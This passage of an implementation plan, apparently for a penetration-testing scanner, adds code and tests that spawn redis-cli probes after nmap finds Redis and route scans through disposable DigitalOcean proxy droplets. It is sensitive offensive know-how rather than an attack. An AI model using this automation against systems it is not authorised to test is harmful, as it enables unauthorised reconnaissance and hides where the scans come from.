+        task = _make_task(tool="nmap")
+        new_tasks = self.strategy.evaluate(state, "scan-1", task)
+        assert new_tasks == []
+
+    def test_no_spawn_when_already_spawned(self):
+        """Idempotent: evaluate() self-tracks, second call returns empty."""
+        state = _state_with_redis()
+        task = _make_task(tool="nmap")
+        first = self.strategy.evaluate(state, "scan-1", task)
+        assert len(first) == 1
+
+        # Second evaluate on the same strategy instance — should be empty
+        # because evaluate() marked the service key internally.
+        second = self.strategy.evaluate(state, "scan-1", task)
+        assert second == []
+
+    def test_spawns_for_multiple_redis_instances(self):
+        state = KillChainState()
+        state.ingest(IntelBundle(services=[
+            DiscoveredService(host="10.0.0.1", port=6379, protocol="tcp", service="redis"),
+            DiscoveredService(host="10.0.0.2", port=6379, protocol="tcp", service="redis"),
+        ]))
+        task = _make_task(tool="nmap")
+        new_tasks = self.strategy.evaluate(state, "scan-1", task)
+        assert len(new_tasks) == 2
+        hosts = {t.command.split("-h ")[1].split(" ")[0] for t in new_tasks}
+        assert hosts == {"10.0.0.1", "10.0.0.2"}
+
+    def test_ignores_non_nmap_tool(self):
+        """Only triggers on nmap/masscan completions."""
+        state = _state_with_redis()
+        task = _make_task(tool="semgrep")
+        new_tasks = self.strategy.evaluate(state, "scan-1", task)
+        assert new_tasks == []
+
+    def test_task_ids_are_deterministic(self):
+        """Same input produces same task IDs, enabling dedup in _inject_tasks."""
+        state = _state_with_redis()
+        task = _make_task(tool="nmap")
+        tasks_a = self.strategy.evaluate(state, "scan-1", task)
+        # Reset strategy state for second evaluation
+        strategy_b = RedisProbeStrategy()
+        tasks_b = strategy_b.evaluate(state, "scan-1", task)
+        assert tasks_a[0].id == tasks_b[0].id
+
+
+class TestGetBuiltinStrategies:
+    def test_returns_list(self):
+        strategies = get_builtin_strategies()
+        assert isinstance(strategies, list)
+
+    def test_contains_redis_probe(self):
+        strategies = get_builtin_strategies()
+        names = [s.name for s in strategies]
+        assert "redis_probe" in names
+
+    def test_all_satisfy_protocol(self):
+        strategies = get_builtin_strategies()
+        for s in strategies:
+            assert isinstance(s, MutationStrategy)
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_strategy.py::TestRedisProbeStrategy::test_name -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement MutationStrategy protocol, RedisProbeStrategy, get_builtin_strategies**
+
+```python
+# packages/cli/src/opentools/scanner/mutation/strategy.py
+"""MutationStrategy protocol and builtin implementations.
+
+Strategies evaluate the accumulated KillChainState after each task
+completion and synthesize new ScanTask objects for injection into
+the DAG.  Each strategy tracks what it has already spawned to
+maintain idempotency.
+"""
+
+from __future__ import annotations
+
+from typing import Protocol, runtime_checkable
+
+from opentools.scanner.models import (
+    ExecutionTier,
+    ScanTask,
+    TaskType,
+)
+from opentools.scanner.mutation.models import KillChainState
+
+
+@runtime_checkable
+class MutationStrategy(Protocol):
+    """Evaluates kill chain state and synthesizes new tasks."""
+    name: str
+    max_spawns: int
+
+    def evaluate(
+        self,
+        state: KillChainState,
+        scan_id: str,
+        completed_task: ScanTask,
+    ) -> list[ScanTask]: ...
+
+
+class RedisProbeStrategy:
+    """Spawn redis-cli INFO probes when nmap discovers Redis services.
+
+    Uses DOCKER_EXEC to run redis-cli inside a container, avoiding
+    the need for redis-cli on the host.
+
+    Self-tracking: marks service keys as spawned inside evaluate(),
+    so the engine doesn't need to call back.
+    """
+    name = "redis_probe"
+    max_spawns = 10
+
+    # Tools that discover network services
+    _TRIGGER_TOOLS = {"nmap", "masscan"}
+
+    def __init__(self) -> None:
+        self._spawned_keys: set[str] = set()
+
+    def evaluate(
+        self,
+        state: KillChainState,
+        scan_id: str,
+        completed_task: ScanTask,
+    ) -> list[ScanTask]:
+        if completed_task.tool not in self._TRIGGER_TOOLS:
+            return []
+
+        redis_services = state.get_services("redis")
+        if not redis_services:
+            return []
+
+        tasks: list[ScanTask] = []
+        for svc in redis_services:
+            key = f"{svc.host}:{svc.port}/{svc.protocol}"
+            if key in self._spawned_keys:
+                continue
+
+            self._spawned_keys.add(key)  # self-track immediately
+            task_id = f"redis-probe-{svc.host}-{svc.port}"
+            tasks.append(ScanTask(
+                id=task_id,
+                scan_id=scan_id,
+                name=f"Redis probe {svc.host}:{svc.port}",
+                tool="redis-cli",
+                task_type=TaskType.DOCKER_EXEC,
+                command=f"redis-cli -h {svc.host} -p {svc.port} INFO",
+                depends_on=[completed_task.id],
+                priority=20,
+                tier=ExecutionTier.FAST,
+                spawned_by=completed_task.id,
+                spawned_reason=f"nmap discovered Redis on {svc.host}:{svc.port}",
+            ))
+
+        return tasks
+
+
+def get_builtin_strategies() -> list[MutationStrategy]:
+    """Return all builtin mutation strategies."""
+    return [
+        RedisProbeStrategy(),
+    ]
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_strategy.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/mutation/strategy.py packages/cli/tests/test_scanner/test_mutation_strategy.py
+git commit -m "feat(mutation): add MutationStrategy protocol with RedisProbeStrategy"
+```
+
+---
+
+### Task 4: Engine Integration — Wire Mutation Layer into ScanEngine
+
+**Files:**
+- Modify: `packages/cli/src/opentools/scanner/engine.py:35-63` (`__init__`)
+- Modify: `packages/cli/src/opentools/scanner/engine.py:257-274` (`_mark_completed`)
+- Modify: `packages/cli/src/opentools/scanner/engine.py:350-357` (`_inject_tasks`)
+- Test: `packages/cli/tests/test_scanner/test_engine_mutation.py`
+
+**Context:** The mutation layer hooks into `_mark_completed` after the existing pipeline queueing and before the existing reactive edge evaluation. All mutation logic is synchronous — no `await` points — so the single-threaded event loop guarantee holds. The existing reactive edges remain backward compatible.
+
+- [ ] **Step 1: Write failing integration tests**
+
+```python
+# packages/cli/tests/test_scanner/test_engine_mutation.py
+"""Integration tests: ScanEngine + mutation layer."""
+
+import asyncio
+from datetime import datetime, timezone
+from typing import Callable
+
+import pytest
+
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.engine import ScanEngine
+from opentools.scanner.executor.base import TaskOutput
+from opentools.scanner.models import (
+    Scan,
+    ScanStatus,
+    ScanTask,
+    TaskStatus,
+    TaskType,
+    TargetType,
+)
+from opentools.scanner.mutation.analyzer import AnalyzerRegistry, NmapAnalyzer
+from opentools.scanner.mutation.models import KillChainState
+from opentools.scanner.mutation.strategy import RedisProbeStrategy
+from opentools.shared.progress import EventBus
+from opentools.shared.resource_pool import AdaptiveResourcePool
+
+
+# Nmap XML that discovers a Redis service
+NMAP_REDIS_XML = """\
+<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="6379">
+        <state state="open"/>
+        <service name="redis" product="Redis" version="6.2.7"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>"""
+
+# Nmap XML with no interesting services
+NMAP_HTTP_ONLY_XML = """\
+<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="80">
+        <state state="open"/>
+        <service name="http"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>"""
+
+
+class MockExecutor:
+    def __init__(self, results: dict[str, TaskOutput] | None = None):
+        self._results = results or {}
+        self._default = TaskOutput(exit_code=0, stdout="ok", duration_ms=10)
+        self.executed: list[str] = []
+
+    async def execute(
+        self, task: ScanTask, on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
+    ) -> TaskOutput:
+        self.executed.append(task.id)
+        return self._results.get(task.id, self._default)
+
+
+def _make_scan() -> Scan:
+    return Scan(
+        id="scan-1", engagement_id="eng-1", target="10.0.0.1",
+        target_type=TargetType.NETWORK, status=ScanStatus.PENDING,
+        created_at=datetime.now(timezone.utc),
+    )
+
+
+def _make_engine_with_mutation(
+    tasks: list[ScanTask],
+    executor: MockExecutor,
+    max_mutation_spawns: int = 100,
+) -> ScanEngine:
+    pool = AdaptiveResourcePool(global_limit=4)
+    executors = {
+        TaskType.SHELL: executor,
+        TaskType.DOCKER_EXEC: executor,
+        TaskType.MCP_CALL: executor,
+    }
+    engine = ScanEngine(
+        scan=_make_scan(),
+        resource_pool=pool,
+        executors=executors,
+        event_bus=EventBus(),
+        cancellation=CancellationToken(),
+    )
+
+    # Wire up mutation layer
+    analyzer_registry = AnalyzerRegistry()
+    analyzer_registry.register_builtins()
+    engine.set_analyzer_registry(analyzer_registry)
+    engine.set_mutation_strategies([RedisProbeStrategy()])
+    engine.set_max_mutation_spawns(max_mutation_spawns)
+
+    engine.load_tasks(tasks)
+    return engine
+
+
+class TestEngineMutationIntegration:
+    @pytest.mark.asyncio
+    async def test_nmap_redis_spawns_probe(self):
+        """Nmap finds Redis → engine spawns redis-cli probe → probe runs."""
+        executor = MockExecutor(results={
+            "nmap-scan": TaskOutput(
+                exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100,
+            ),
+        })
+        nmap_task = ScanTask(
+            id="nmap-scan", scan_id="scan-1", name="nmap",
+            tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1",
+        )
+        engine = _make_engine_with_mutation([nmap_task], executor)
+        await engine.run()
+
+        # The spawned redis probe should have been executed
+        assert "nmap-scan" in executor.executed
+        assert "redis-probe-10.0.0.1-6379" in executor.executed
+
+        # Verify the spawned task has correct metadata
+        spawned = engine._tasks["redis-probe-10.0.0.1-6379"]
+        assert spawned.tool == "redis-cli"
+        assert spawned.spawned_by == "nmap-scan"
+        assert spawned.status == TaskStatus.COMPLETED
+
+    @pytest.mark.asyncio
+    async def test_no_mutation_when_no_interesting_services(self):
+        """Nmap finds only HTTP → no mutation strategies fire."""
+        executor = MockExecutor(results={
+            "nmap-scan": TaskOutput(
+                exit_code=0, stdout=NMAP_HTTP_ONLY_XML, duration_ms=100,
+            ),
+        })
+        nmap_task = ScanTask(
+            id="nmap-scan", scan_id="scan-1", name="nmap",
+            tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1",
+        )
+        engine = _make_engine_with_mutation([nmap_task], executor)
+        await engine.run()
+
+        assert executor.executed == ["nmap-scan"]
+        assert len(engine._tasks) == 1
+
+    @pytest.mark.asyncio
+    async def test_mutation_respects_global_budget(self):
+        """Global spawn budget prevents unbounded task injection."""
+        executor = MockExecutor(results={
+            "nmap-scan": TaskOutput(
+                exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100,
+            ),
+        })
+        nmap_task = ScanTask(
+            id="nmap-scan", scan_id="scan-1", name="nmap",
+            tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1",
+        )
+        engine = _make_engine_with_mutation(
+            [nmap_task], executor, max_mutation_spawns=0,
+        )
+        await engine.run()
+
+        # Budget is 0 — no mutations allowed
+        assert executor.executed == ["nmap-scan"]
+        assert len(engine._tasks) == 1
+
+    @pytest.mark.asyncio
+    async def test_mutation_coexists_with_reactive_edges(self):
+        """Both mutation strategies AND reactive edges can fire on the same task."""
+        from opentools.scanner.models import ReactiveEdge
+
+        executor = MockExecutor(results={
+            "nmap-scan": TaskOutput(
+                exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100,
+            ),
+        })
+
+        edge_task = ScanTask(
+            id="edge-spawned", scan_id="scan-1", name="edge-task",
+            tool="test", task_type=TaskType.SHELL, command="echo edge",
+        )
+        edge = ReactiveEdge(
+            id="edge-1", trigger_task_id="nmap-scan",
+            evaluator="always", spawns=[edge_task],
+        )
+        nmap_task = ScanTask(
+            id="nmap-scan", scan_id="scan-1", name="nmap",
+            tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1",
+            reactive_edges=[edge],
+        )
+
+        engine = _make_engine_with_mutation([nmap_task], executor)
+        engine.register_edge_evaluator("always", lambda t, o, e: e.spawns or [])
+        await engine.run()
+
+        # Both mutation-spawned AND edge-spawned tasks should run
+        assert "redis-probe-10.0.0.1-6379" in executor.executed
+        assert "edge-spawned" in executor.executed
+
+    @pytest.mark.asyncio
+    async def test_kill_chain_state_accessible(self):
+        """Engine exposes kill chain state for inspection."""
+        executor = MockExecutor(results={
+            "nmap-scan": TaskOutput(
+                exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100,
+            ),
+        })
+        nmap_task = ScanTask(
+            id="nmap-scan", scan_id="scan-1", name="nmap",
+            tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1",
+        )
+        engine = _make_engine_with_mutation([nmap_task], executor)
+        await engine.run()
+
+        state = engine.kill_chain_state
+        assert state.has_service("redis")
+        assert state.total_spawned == 1
+
+    @pytest.mark.asyncio
+    async def test_no_mutation_without_registry(self):
+        """Engine works normally when no mutation layer is configured."""
+        executor = MockExecutor(results={
+            "nmap-scan": TaskOutput(
+                exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100,
+            ),
+        })
+        nmap_task = ScanTask(
+            id="nmap-scan", scan_id="scan-1", name="nmap",
+            tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1",
+        )
+        # Build engine WITHOUT mutation layer
+        pool = AdaptiveResourcePool(global_limit=4)
+        engine = ScanEngine(
+            scan=_make_scan(), resource_pool=pool,
+            executors={TaskType.SHELL: executor, TaskType.DOCKER_EXEC: executor},
+            event_bus=EventBus(), cancellation=CancellationToken(),
+        )
+        engine.load_tasks([nmap_task])
+        await engine.run()
+
+        # Should complete normally with no mutations
+        assert executor.executed == ["nmap-scan"]
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_mutation.py::TestEngineMutationIntegration::test_nmap_redis_spawns_probe -v`
+Expected: FAIL with `AttributeError: 'ScanEngine' object has no attribute 'set_analyzer_registry'`
+
+- [ ] **Step 3: Modify ScanEngine.__init__ — add mutation fields**
+
+In `packages/cli/src/opentools/scanner/engine.py`, add after the existing `self._cache` and `self._pipeline_results` fields (around line 69):
+
+```python
+        # Mutation layer (optional — engine works without it)
+        self._analyzer_registry: AnalyzerRegistry | None = None
+        self._mutation_strategies: list[Any] = []
+        self._kill_chain = KillChainState()
+        self._max_mutation_spawns: int = 100
+```
+
+Add the imports at the top of the file (after the existing imports):
+
+```python
+from opentools.scanner.mutation.models import KillChainState
+```
+
+Add these public methods after the existing `set_cache` method (around line 122):
+
+```python
+    def set_analyzer_registry(self, registry: Any) -> None:
+        """Set the OutputAnalyzer registry for mutation layer."""
+        self._analyzer_registry = registry
+
+    def set_mutation_strategies(self, strategies: list[Any]) -> None:
+        """Set the mutation strategies for dynamic task injection."""
+        self._mutation_strategies = list(strategies)
+
+    def set_max_mutation_spawns(self, limit: int) -> None:
+        """Set the global budget for mutation-spawned tasks."""
+        self._max_mutation_spawns = limit
+
+    @property
+    def kill_chain_state(self) -> KillChainState:
+        """Read-only access to accumulated attack surface state."""
+        return self._kill_chain
+```
+
+- [ ] **Step 4: Modify ScanEngine._mark_completed — hook mutation layer**
+
+Replace the existing `_mark_completed` method (lines 257-274) with:
+
+```python
+    def _mark_completed(self, task_id: str, output: TaskOutput) -> None:
+        task = self._tasks[task_id]
+        task.status = TaskStatus.COMPLETED
+        task.exit_code = output.exit_code
+        task.stdout = output.stdout
+        task.stderr = output.stderr
+        task.duration_ms = output.duration_ms
+        task.cached = output.cached
+        self._completed.add(task_id)
+
+        # Queue output for pipeline processing
+        if self._pipeline is not None:
+            self._pipeline_results[task_id] = output
+
+        # --- Mutation layer: analyze → ingest → evaluate strategies ---
+        mutation_tasks = self._evaluate_mutations(task, output)
+
+        # --- Existing reactive edges (backward compatible) ---
+        edge_tasks = self._evaluate_edges(task, output)
+
+        all_new = mutation_tasks + edge_tasks
+        if all_new:
+            self._inject_tasks(all_new)
+```
+
+Add the `_evaluate_mutations` method after `_evaluate_edges` (after line 348):
+
+```python
+    def _evaluate_mutations(
+        self, task: ScanTask, output: TaskOutput
+    ) -> list[ScanTask]:
+        """Run mutation layer: analyze output, update state, evaluate strategies."""
+        if self._analyzer_registry is None:
+            return []
+
+        # 1. Extract intel from tool output
+        analyzer = self._analyzer_registry.get(task.tool)
+        if analyzer is not None and output.stdout:
+            bundle = analyzer.analyze(output.stdout, output.stderr or "")
+            self._kill_chain.ingest(bundle)
+
+        # 2. Evaluate strategies against accumulated state
+        new_tasks: list[ScanTask] = []
+        if self._kill_chain.total_spawned >= self._max_mutation_spawns:
+            return []
+
+        for strategy in self._mutation_strategies:
+            budget_used = self._kill_chain.tasks_spawned.get(strategy.name, 0)
+            if budget_used >= strategy.max_spawns:
+                continue
+
+            remaining_strategy = strategy.max_spawns - budget_used
+            remaining_global = self._max_mutation_spawns - self._kill_chain.total_spawned
+
+            spawned = strategy.evaluate(self._kill_chain, self.scan.id, task)
+
+            allowed = min(remaining_strategy, remaining_global, len(spawned))
+            accepted: list[ScanTask] = []
+            for s in spawned[:allowed]:
+                if s.id not in self._tasks:
+                    accepted.append(s)
+
+            # Strategies self-track their spawned keys inside evaluate(),
+            # so the engine only needs to update the global budget.
+            if accepted:
+                self._kill_chain.record_spawn(strategy.name, len(accepted))
+                new_tasks.extend(accepted)
+
+        return new_tasks
+```
+
+- [ ] **Step 5: Harden _inject_tasks with dependency validation**
+
+Replace the existing `_inject_tasks` method (lines 350-357) with:
+
+```python
+    def _inject_tasks(self, tasks: list[ScanTask]) -> None:
+        """Add dynamically spawned tasks to the graph.
+
+        Validates that all dependencies exist. Drops tasks with unknown
+        dependencies to prevent forward-reference cycles.
+        """
+        for t in tasks:
+            if t.id in self._tasks:
+                continue
+            # Validate all dependencies exist in the graph
+            valid = True
+            for dep in t.depends_on:
+                if dep not in self._tasks:
+                    import logging
+                    logging.getLogger(__name__).warning(
+                        "Dropping spawned task %s: depends on unknown task %s",
+                        t.id, dep,
+                    )
+                    valid = False
+                    break
+            if valid:
+                self._tasks[t.id] = t
+                for dep in t.depends_on:
+                    self._dependents[dep].add(t.id)
+```
+
+- [ ] **Step 6: Run integration tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_mutation.py -v`
+Expected: All PASS
+
+- [ ] **Step 7: Run existing engine tests to verify backward compatibility**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine.py -v`
+Expected: All PASS — no regressions
+
+- [ ] **Step 8: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/engine.py packages/cli/tests/test_scanner/test_engine_mutation.py
+git commit -m "feat(engine): integrate mutation layer — analyzer → state → strategy → inject"
+```
+
+---
+
+## Phase B: Ephemeral Proxy Routing
+
+### Task 5: Add `env` Parameter to `run_streaming`
+
+**Files:**
+- Modify: `packages/cli/src/opentools/shared/subprocess.py:43-48` (function signature)
+- Modify: `packages/cli/src/opentools/shared/subprocess.py:68` (`create_subprocess_exec` call)
+- Modify: `packages/cli/tests/test_scanner/test_shared_subprocess.py`
+
+- [ ] **Step 1: Write failing test for env parameter**
+
+Add to `packages/cli/tests/test_scanner/test_shared_subprocess.py`:
+
+```python
+class TestRunStreamingEnv:
+    @pytest.mark.asyncio
+    async def test_env_vars_passed_to_subprocess(self):
+        """Custom env dict is forwarded to the child process."""
+        import os
+        custom_env = {**os.environ, "OT_TEST_PROXY": "socks5://127.0.0.1:1080"}
+        result = await run_streaming(
+            [sys.executable, "-c", "import os; print(os.environ.get('OT_TEST_PROXY', 'MISSING'))"],
+            on_output=lambda _: None,
+            env=custom_env,
+        )
+        assert result.exit_code == 0
+        assert "socks5://127.0.0.1:1080" in result.stdout
+
+    @pytest.mark.asyncio
+    async def test_env_none_inherits_parent(self):
+        """env=None (default) inherits the parent process environment."""
+        result = await run_streaming(
+            [sys.executable, "-c", "import os; print(os.environ.get('PATH', 'MISSING'))"],
+            on_output=lambda _: None,
+        )
+        assert result.exit_code == 0
+        assert "MISSING" not in result.stdout
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_shared_subprocess.py::TestRunStreamingEnv -v`
+Expected: FAIL with `TypeError: run_streaming() got an unexpected keyword argument 'env'`
+
+- [ ] **Step 3: Add env parameter to run_streaming**
+
+In `packages/cli/src/opentools/shared/subprocess.py`, change the function signature (line 43):
+
+```python
+async def run_streaming(
+    args: list[str],
+    on_output: Callable[[bytes], None],
+    timeout: int = 300,
+    cancellation: object | None = None,  # CancellationToken
+    env: dict[str, str] | None = None,
+) -> SubprocessResult:
+```
+
+And pass it through at line 68:
+
+```python
+        proc = await asyncio.create_subprocess_exec(
+            *args,
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE,
+            env=env,
+        )
+```
+
+- [ ] **Step 4: Run all subprocess tests to verify pass + no regressions**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_shared_subprocess.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/cli/src/opentools/shared/subprocess.py packages/cli/tests/test_scanner/test_shared_subprocess.py
+git commit -m "feat(subprocess): add env parameter to run_streaming for proxy injection"
+```
+
+---
+
+### Task 6: CloudNodeProvider ABC + DigitalOcean Implementation
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/infra/__init__.py`
+- Create: `packages/cli/src/opentools/scanner/infra/provider.py`
+- Create: `packages/cli/src/opentools/scanner/infra/digitalocean.py`
+- Test: `packages/cli/tests/test_scanner/test_infra_provider.py`
+
+- [ ] **Step 1: Write failing tests**
+
+```python
+# packages/cli/tests/test_scanner/test_infra_provider.py
+"""Tests for CloudNodeProvider and DigitalOceanProvider."""
+
+import asyncio
+import json
+
+import httpx
+import pytest
+
+from opentools.scanner.infra.provider import (
+    CloudNodeProvider,
+    EphemeralNode,
+    ProvisioningError,
+    ProvisioningTimeout,
+)
+from opentools.scanner.infra.digitalocean import DigitalOceanProvider
+
+
+class TestEphemeralNode:
+    def test_construction(self):
+        node = EphemeralNode(
+            provider_id="12345",
+            ip_address="1.2.3.4",
+            region="nyc3",
+            ssh_key_fingerprint="aa:bb:cc",
+        )
+        assert node.provider_id == "12345"
+        assert node.ip_address == "1.2.3.4"
+        assert node.tags == []
+
+
+class TestDigitalOceanProvider:
+    @pytest.mark.asyncio
+    async def test_create_node_sends_correct_request(self):
+        """Verify the POST payload sent to the DO API."""
+        captured_request = None
+
+        async def mock_handler(request: httpx.Request) -> httpx.Response:
+            nonlocal captured_request
+            captured_request = request
+            return httpx.Response(
+                200, json={"droplet": {"id": 12345}},
+            )
+
+        transport = httpx.MockTransport(mock_handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2")
+        provider = DigitalOceanProvider(client=client)
+
+        result = await provider.create_node(
+            region="nyc3", ssh_public_key="fp:aa:bb", tags=["test"],
+        )
+        assert result == "12345"
+        body = json.loads(captured_request.content)
+        assert body["region"] == "nyc3"
+        assert "test" in body["tags"]
+
+    @pytest.mark.asyncio
+    async def test_poll_status_active(self):
+        async def mock_handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={
+                "droplet": {
+                    "id": 12345, "status": "active",
+                    "networks": {"v4": [{"ip_address": "1.2.3.4", "type": "public"}]},
+                },
+            })
+
+        transport = httpx.MockTransport(mock_handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2")
+        provider = DigitalOceanProvider(client=client)
+
+        status, ip = await provider.poll_status("12345")
+        assert status == "active"
+        assert ip == "1.2.3.4"
+
+    @pytest.mark.asyncio
+    async def test_poll_status_creating(self):
+        async def mock_handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={
+                "droplet": {"id": 12345, "status": "new", "networks": {"v4": []}},
+            })
+
+        transport = httpx.MockTransport(mock_handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2")
+        provider = DigitalOceanProvider(client=client)
+
+        status, ip = await provider.poll_status("12345")
+        assert status == "creating"
+        assert ip is None
+
+    @pytest.mark.asyncio
+    async def test_destroy_node_204(self):
+        async def mock_handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(204)
+
+        transport = httpx.MockTransport(mock_handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2")
+        provider = DigitalOceanProvider(client=client)
+
+        await provider.destroy_node("12345")  # should not raise
+
+    @pytest.mark.asyncio
+    async def test_destroy_node_404_is_idempotent(self):
+        async def mock_handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(404)
+
+        transport = httpx.MockTransport(mock_handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2")
+        provider = DigitalOceanProvider(client=client)
+
+        await provider.destroy_node("12345")  # should not raise
+
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_success(self):
+        call_count = 0
+
+        async def mock_handler(request: httpx.Request) -> httpx.Response:
+            nonlocal call_count
+            call_count += 1
+            if call_count < 3:
+                return httpx.Response(200, json={
+                    "droplet": {"id": 12345, "status": "new", "networks": {"v4": []}},
+                })
+            return httpx.Response(200, json={
+                "droplet": {
+                    "id": 12345, "status": "active",
+                    "networks": {"v4": [{"ip_address": "1.2.3.4", "type": "public"}]},
+                },
+            })
+
+        transport = httpx.MockTransport(mock_handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2")
+        provider = DigitalOceanProvider(client=client)
+
+        ip = await provider.wait_until_ready("12345", poll_interval=0.01, max_polls=10)
+        assert ip == "1.2.3.4"
+        assert call_count == 3
+
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_timeout(self):
+        async def mock_handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={
+                "droplet": {"id": 12345, "status": "new", "networks": {"v4": []}},
+            })
+
+        transport = httpx.MockTransport(mock_handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2")
+        provider = DigitalOceanProvider(client=client)
+
+        with pytest.raises(ProvisioningTimeout):
+            await provider.wait_until_ready("12345", poll_interval=0.01, max_polls=3)
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_provider.py::TestEphemeralNode -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement CloudNodeProvider, EphemeralNode, DigitalOceanProvider**
+
+```python
+# packages/cli/src/opentools/scanner/infra/__init__.py
+"""Ephemeral infrastructure provisioning for proxied scan execution."""
+```
+
+```python
+# packages/cli/src/opentools/scanner/infra/provider.py
+"""CloudNodeProvider ABC and shared types for ephemeral infrastructure."""
+
+from __future__ import annotations
+
+import asyncio
+import logging
+from abc import ABC, abstractmethod
+from typing import Any
+
+from pydantic import BaseModel, Field
+
+logger = logging.getLogger(__name__)
+
+
+class EphemeralNode(BaseModel):
+    """A provisioned ephemeral cloud node."""
+    provider_id: str
+    ip_address: str
+    region: str
+    ssh_key_fingerprint: str
+    tags: list[str] = Field(default_factory=list)
+    metadata: dict[str, Any] = Field(default_factory=dict)
+
+
+class ProvisioningError(Exception):
+    """Cloud node provisioning failed."""
+
+
+class ProvisioningTimeout(ProvisioningError):
+    """Cloud node did not become ready within the polling budget."""
+
+
+class CloudNodeProvider(ABC):
+    """Abstract base for provisioning ephemeral proxy nodes.
+
+    All methods are async — they make HTTP calls and must never block
+    the event loop.
+    """
+
+    @abstractmethod
+    async def create_node(
+        self, region: str, ssh_public_key: str, tags: list[str],
+    ) -> str:
+        """Create a node. Returns the provider resource ID (not yet ready)."""
+        ...
+
+    @abstractmethod
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]:
+        """Returns (status, ip_address | None). Status: "creating" | "active" | "error"."""
+        ...
+
+    @abstractmethod
+    async def destroy_node(self, provider_id: str) -> None:
+        """Destroy a node. Idempotent — must not raise if already gone."""
+        ...
+
+    async def wait_until_ready(
+        self,
+        provider_id: str,
+        poll_interval: float = 3.0,
+        max_polls: int = 60,
+    ) -> str:
+        """Poll until active. Returns IP address. Yields to event loop between polls."""
+        for attempt in range(max_polls):
+            status, ip = await self.poll_status(provider_id)
+            if status == "active" and ip is not None:
+                logger.info("Node %s ready at %s after %d polls", provider_id, ip, attempt + 1)
+                return ip
+            if status == "error":
+                raise ProvisioningError(f"Node {provider_id} entered error state")
+            await asyncio.sleep(poll_interval)
+        raise ProvisioningTimeout(
+            f"Node {provider_id} not ready after {max_polls * poll_interval:.0f}s"
+        )
+```
+
+```python
+# packages/cli/src/opentools/scanner/infra/digitalocean.py
+"""DigitalOcean CloudNodeProvider implementation."""
+
+from __future__ import annotations
+
+import uuid
+
+import httpx
+
+from opentools.scanner.infra.provider import CloudNodeProvider
+
+
+class DigitalOceanProvider(CloudNodeProvider):
+    """Provision ephemeral droplets via the DigitalOcean API."""
+
+    def __init__(self, client: httpx.AsyncClient) -> None:
+        self._client = client
+
+    @classmethod
+    def from_token(cls, api_token: str) -> DigitalOceanProvider:
+        """Create a provider with a new httpx client using the given API token."""
+        client = httpx.AsyncClient(
+            base_url="https://api.digitalocean.com/v2",
+            headers={"Authorization": f"Bearer {api_token}"},
+            timeout=30.0,
+        )
+        return cls(client=client)
+
+    async def create_node(
+        self, region: str, ssh_public_key: str, tags: list[str],
+    ) -> str:
+        resp = await self._client.post("/droplets", json={
+            "name": f"ot-proxy-{uuid.uuid4().hex[:8]}",
+            "region": region,
+            "size": "s-1vcpu-512mb-10gb",
+            "image": "ubuntu-24-04-x64",
+            "ssh_keys": [ssh_public_key],
+            "tags": tags,
+        })
+        resp.raise_for_status()
+        return str(resp.json()["droplet"]["id"])
+
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]:
